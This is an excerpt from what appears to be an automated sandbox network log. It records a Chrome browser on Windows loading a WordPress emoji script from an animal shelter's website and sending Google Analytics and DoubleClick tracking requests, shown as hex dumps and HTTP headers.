                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: a5 18 5c 60 5e 97 24 21 d9 1c 46 42 ec 18 ac 65 d9 34 bc 78 71 86 52 92 ed 61 a0 73 47 c6 60 99 d7 9a b3 79 45 51 18 2a 53 20 81 45 ad 69 f7 2d cb dd 35 ab f3 7b 34 cb 73 a4 34 cc cf ce 31 cd 92 d9 f9 4d 9a f3 17 58 5d 3c cf c3 e6 9b 1c 37 0f d8 ef ae 71 e3 80 36 9a 61 3c 50 e8 81 b2 2a 99 2f 1a a2 10 1c 8f 03 31 4a ea 26 4d e5 44 8b 86 e5 ac e6 e0 2d be b7 68 a9 a6 75 8f e8 d1 32 b0 6c 0a 16 4d 4d e7 1c d6 7a 92 b3 54 a5 c1 18 85 52 92 04 68 95 28 0a 43 69 34 a4 44 37 78 5c 6f 49 11 bc 83 de 07 46 3b 00 01 6d 04 65 71 a4 3a 6c e9 b7 f7 18 db 1d b7 7f e0 5f c1 34 ab c7 f5 a7 78 06 fc a7 c0 83 94 d2 df ca 25 42 b3 2c 7b a7 e4 3d 00 59 f6 0e 3b 6d ec 7d 09 f8 57 81 bf 00 7c 96 77 c1 6c 3f 00 29 12 c6 96 ee c1 57 70 87 2b 94 ae 88 b6 43 46 8b dd bd 81 3f 3e
                                                                                                                                                                                                                                                        Data Ascii: \`^$!FBe4xqRasG`yEQ*S Ei-5{4s41MX]<7q6a<P*/1J&MD-hu2lMMzTRh(Ci4D7x\oIF;meq:l_4x%B,{=Y;m}W|wl?)Wp+CF?>
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: ec 91 14 02 49 14 8c c7 2d c3 61 cf 7e 7b 00 91 a8 eb 12 9f 06 66 8b 4b 50 25 fb 76 47 90 81 98 24 da cc 89 c1 a3 9b 73 74 51 11 fa 1d 7e d8 12 48 20 12 e3 d0 23 a2 60 ff f0 3e 3e 7a bc b7 28 a9 18 ad e5 ec e6 8b 68 51 33 b6 47 84 2e 99 9d dd 64 fb f0 0e 04 4f 51 34 98 72 c9 8b 1f 5c 32 9b cd 70 7e a4 ac 67 08 f5 02 c4 c4 6e fb 15 96 97 97 98 d2 b0 4a 06 bb df e2 8e 1d 4a 6b 46 eb d8 ec 37 b4 fb 81 0f 7f f2 63 c8 e8 e9 f6 1b 86 61 64 b1 5c 52 54 15 c3 e1 21 63 d7 23 78 54 1e 52 93 52 a2 6b 3b c6 71 e0 e2 c6 92 aa 92 5c df bf c3 66 d7 72 71 7e ce d0 77 e8 10 69 ce ce 91 65 83 6b 5b 1e be f9 80 6e f3 90 db 1f bc 81 6b 37 68 b3 a7 5b 3f e0 fa ee 5d 8a 4a 53 2f e7 24 1f 39 1c 07 ee dc 7d 40 74 03 ab e5 0c 53 56 9c 9d 95 78 17 48 62 aa 6f 5f d5 05 52 55 ac 37
                                                                                                                                                                                                                                                        Data Ascii: I-a~{fKP%vG$stQ~H #`>>z(hQ3G.dOQ4r\2p~gnJJkF7cad\RT!c#xTRRk;q\frq~wiek[nk7h[?]JS/$9}@tSVxHbo_RU7
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: d2 08 9f f0 d6 93 8c e0 f9 0f 7c 98 76 b7 25 f8 8e 42 1b 08 89 e4 13 e3 76 cd fd 37 df c0 86 03 ab cb e7 28 97 97 1c 1e ae f9 a5 7f fc 45 dc 68 f9 cc a7 3e cc 66 7b a0 7d e3 2e ca cc 59 2e 96 c8 90 40 46 ce 2e ce 18 86 23 a3 9b 66 d3 53 4a 24 e1 51 ca a1 a2 c3 e8 c4 83 87 1b fa e0 b8 38 bb a0 99 2d 09 14 5c 0d 7b ee dc bf 46 13 98 29 c9 e8 03 67 b3 d9 54 e1 a7 f3 04 1f 69 47 cf ae 8f d8 61 7a 4e 89 e0 c6 79 41 10 9a 90 12 3e 4e 41 1e 48 84 10 08 a1 08 21 d2 8e d3 2a 43 3b 3a ec 98 18 93 64 db 8d 14 5a 20 f0 ec ec 48 a9 15 17 cb 05 ab 85 41 4b e8 ed 94 72 75 5e 2f 48 51 a1 a4 40 69 89 34 82 75 ef b0 09 ce 16 86 d5 42 51 d7 15 fd 20 e8 42 22 1e 1c c3 b8 66 7d bd 65 39 6f b8 79 db a2 ab 15 ba 5e b2 ba b8 41 33 9f d3 1d 1f 12 c6 0e 37 0e 94 dd c8 7c 3e 05 7e
                                                                                                                                                                                                                                                        Data Ascii: |v%Bv7(Eh>f{}.Y.@F.#fSJ$Q8-\{F)gTiGazNyA>NAH!*C;:dZ HAKru^/HQ@i4uBQ B"f}e9oy^A37|>~
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: de 43 6b 23 fb ce 21 85 a0 34 53 47 dc 48 a2 29 0d f3 b2 64 0c 9e 7d ef 48 28 7c 08 f4 76 c4 27 c1 a6 b5 84 20 91 4a 31 2f 0a 7a 67 99 d5 35 75 69 b0 d6 72 68 47 4a 29 a8 8a 84 90 d0 8f 81 d2 c0 cd d5 62 da 28 9e 22 42 c0 6a 39 9f 52 93 82 43 91 d8 77 96 7e 70 3c 7f 31 e3 b9 e5 8c d5 ac a4 ac 34 a3 1b f1 83 a3 a9 0a 2e 96 33 5e 78 fe 26 d5 62 4e 39 5f b2 bc 7c 1e a9 0d ae df 73 dc 3c a4 dd ef d8 6d 36 f8 d0 62 b4 44 0a 81 20 51 68 83 2e 4a 16 cd 1c 5d 48 84 86 e0 05 de ff ff ec bd 49 8c 65 eb 9a 9e f5 fc dd 6a 77 17 4d 46 66 9e 3c cd 3d e7 dc be ec b2 cb 14 c6 46 a6 84 90 65 2c 40 b2 04 0c 2c 84 c4 04 06 16 2a 21 06 08 31 e2 1e 21 84 18 22 81 f0 08 18 31 63 c6 00 3c 42 34 85 85 8d ca e5 e6 de aa 5b f7 b4 79 b2 89 88 1d 3b 76 b3 9a 7f fd 2d 83 95 2e 21 84
                                                                                                                                                                                                                                                        Data Ascii: Ck#!4SGH)d}H(|v' J1/zg5uirhGJ)b("Bj9RCw~p<14.3^x&bN9_|s<m6bD Qh.J]HIejwMFf<=Fe,@,*!1!"1c<B4[y;v-.!


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        107192.168.2.449883199.16.172.264432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC680OUTGET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: indyhumane.org
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: _ga=GA1.1.932040568.1736387953; _gcl_au=1.1.1223850198.1736387954; _gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1; _ga_CDQ7BLPKF7=GS1.1.1736387952.1.0.1736387955.0.0.0; _ga_VFFY2PDZ27=GS1.1.1736387955.1.0.1736387955.60.0.0
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC519INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:17 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 18726
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        Last-Modified: Thu, 27 Jun 2024 12:55:22 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        ETag: "667d613a-4926"
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca BYPASS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC850INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 6a 64 65 63 6b 65 64 2f 74 77 65 6d 6f 6a 69 40 31 35 2e 30 2e 33 2f 61 73 73 65 74 73 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:funct
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: 4f 66 28 22 20 22 2b 66 2b 22 3d 22 29 26 26 28 63 3d 63 2e 63 6f 6e 63 61 74 28 22 20 22 2c 66 2c 27 3d 22 27 2c 75 5b 66 5d 2e 72 65 70 6c 61 63 65 28 74 2c 72 29 2c 27 22 27 29 29 3b 63 3d 63 2e 63 6f 6e 63 61 74 28 22 2f 3e 22 29 7d 72 65 74 75 72 6e 20 63 7d 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 75 29 7b 76 61 72 20 66 2c 63 2c 65 2c 62 2c 61 2c 74 2c 72 2c 6e 2c 6f 2c 73 2c 69 2c 6c 3d 66 75 6e 63 74 69 6f 6e 20 64 28 75 2c 66 29 7b 76 61 72 20 63 2c 65 2c 62 3d 75 2e 63 68 69 6c 64 4e 6f 64 65 73 2c 61 3d 62 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 3b 61 2d 2d 3b 29 63 3d 62 5b 61 5d 2c 33 3d 3d 3d 28 65 3d 63 2e 6e 6f 64 65 54 79 70 65 29 3f 66 2e 70 75 73 68 28 63 29 3a 31 21 3d 3d 65 7c 7c 22 6f 77 6e 65 72 53 56 47 45 6c 65 6d 65 6e 74 22 69 6e
                                                                                                                                                                                                                                                        Data Ascii: Of(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a],3===(e=c.nodeType)?f.push(c):1!==e||"ownerSVGElement"in
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: 36 38 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: 68\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffc\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffd\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37
                                                                                                                                                                                                                                                        Data Ascii: ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc69\ud83c[\udffb-\udfff]|\ud83e\uddd1\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83e\uddd1\ud83c[\udffc-\udfff]|\ud83e\uddd1\ud83c\udffc\u200d\u27
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 65 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c
                                                                                                                                                                                                                                                        Data Ascii: 0d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udfff\u200d\ud83e\udd1d\u200d\ud83d\udc68\ud83c[\udffb-\udffe]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 65 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63
                                                                                                                                                                                                                                                        Data Ascii: dffb-\udffd\udfff]|\ud83d\udc69\ud83c\udffe\u200d\ud83e\udd1d\u200d\ud83d\udc69\ud83c[\udffb-\udffd\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc69\ud83c
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 38 5c 75 64 63 36 39 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 64 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 63 5c 75 64 66 66 65 5c 75 64
                                                                                                                                                                                                                                                        Data Ascii: \ufe0f\u200d\ud83d\udc8b\u200d\ud83d[\udc68\udc69]|\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c[\udffc-\udfff]|\ud83e\udef1\ud83c\udffc\u200d\ud83e\udef2\ud83c[\udffb\udffd-\udfff]|\ud83e\udef1\ud83c\udffd\u200d\ud83e\udef2\ud83c[\udffb\udffc\udffe\ud
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: 64 64 63 64 2d 5c 75 64 64 63 66 5c 75 64 64 64 34 5c 75 64 64 64 36 2d 5c 75 64 64 64 64 5d 29 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 29 3f 5c 75 32 30 30 64 5b 5c 75 32 36 34 30 5c 75 32 36 34 32 5d 5c 75 66 65 30 66 7c 28 3f 3a 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 37 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 36 5c 75 64 63 36 37 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c
                                                                                                                                                                                                                                                        Data Ascii: ddcd-\uddcf\uddd4\uddd6-\udddd])(?:\ud83c[\udffb-\udfff])?\u200d[\u2640\u2642]\ufe0f|(?:\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc66\u200d\ud83d\udc66|\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc67\u200d\ud83d[\udc66\udc67]|\ud83d\udc68\u200d\ud83d\
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: 33 64 5c 75 64 65 33 35 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 61 62 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 64 5c 75 64 63 30 38 5c 75 32 30 30 64 5c 75 32 62 31 62 7c 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: 3d\ude35\u200d\ud83d\udcab|\ud83e\udd3c\u200d\u2640\ufe0f|\ud83e\udd3c\u200d\u2642\ufe0f|\ud83e\uddde\u200d\u2640\ufe0f|\ud83e\uddde\u200d\u2642\ufe0f|\ud83e\udddf\u200d\u2640\ufe0f|\ud83e\udddf\u200d\u2642\ufe0f|\ud83d\udc08\u200d\u2b1b|\ud83d\udc26\u200
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1369INData Raw: 75 32 62 35 35 5c 75 33 30 33 30 5c 75 33 30 33 64 5c 75 33 32 39 37 5c 75 33 32 39 39 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 63 62 5c 75 64 66 63 63 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 64 37 34 5c 75 64 64 37 35 5c 75 64 64 39 30 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 30 7c 5b 5c 75 32 36 31 64 5c 75 32 36 66 37 5c 75 32 36 66 39 5c 75 32 37 30 63 5c 75 32 37 30 64 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 38 35 5c 75 64 66 63 32 2d 5c 75 64 66 63 34 5c 75 64 66 63 37 5c 75 64 66 63 61 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 63 34 32 5c 75 64 63 34 33 5c 75 64 63 34 36 2d 5c 75 64 63 35 30 5c 75 64 63 36
                                                                                                                                                                                                                                                        Data Ascii: u2b55\u3030\u303d\u3297\u3299])(?:\ufe0f|(?!\ufe0e))|(?:(?:\ud83c[\udfcb\udfcc]|\ud83d[\udd74\udd75\udd90]|\ud83e\udef0|[\u261d\u26f7\u26f9\u270c\u270d])(?:\ufe0f|(?!\ufe0e))|(?:\ud83c[\udf85\udfc2-\udfc4\udfc7\udfca]|\ud83d[\udc42\udc43\udc46-\udc50\udc6


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        108192.168.2.449878173.194.76.1544432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC865OUTPOST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-57291413-5&cid=932040568.1736387953&jid=1658224420&gjid=1630441865&_gid=1054392251.1736387956&_u=YCDAiEABBAAAAGAAI~&z=1577462971 HTTP/1.1
                                                                                                                                                                                                                                                        Host: stats.g.doubleclick.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC989INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:17 GMT
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Last-Modified: Sun, 17 May 1998 03:00:00 GMT
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsgdc:149:0
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                                                                                        Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgdc:149:0"}],}
                                                                                                                                                                                                                                                        Server: Golfe2
                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1INData Raw: 31
                                                                                                                                                                                                                                                        Data Ascii: 1


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        109192.168.2.449880142.250.181.2264432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1013OUTGET /td/ga/rul?tid=G-VFFY2PDZ27&gacid=932040568.1736387953&gtm=45je5170v9118100243z8898710595za200zb898710595&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&z=1445872596 HTTP/1.1
                                                                                                                                                                                                                                                        Host: td.doubleclick.net
                                                                                                                                                                                                                                                        Connection: keep-alive
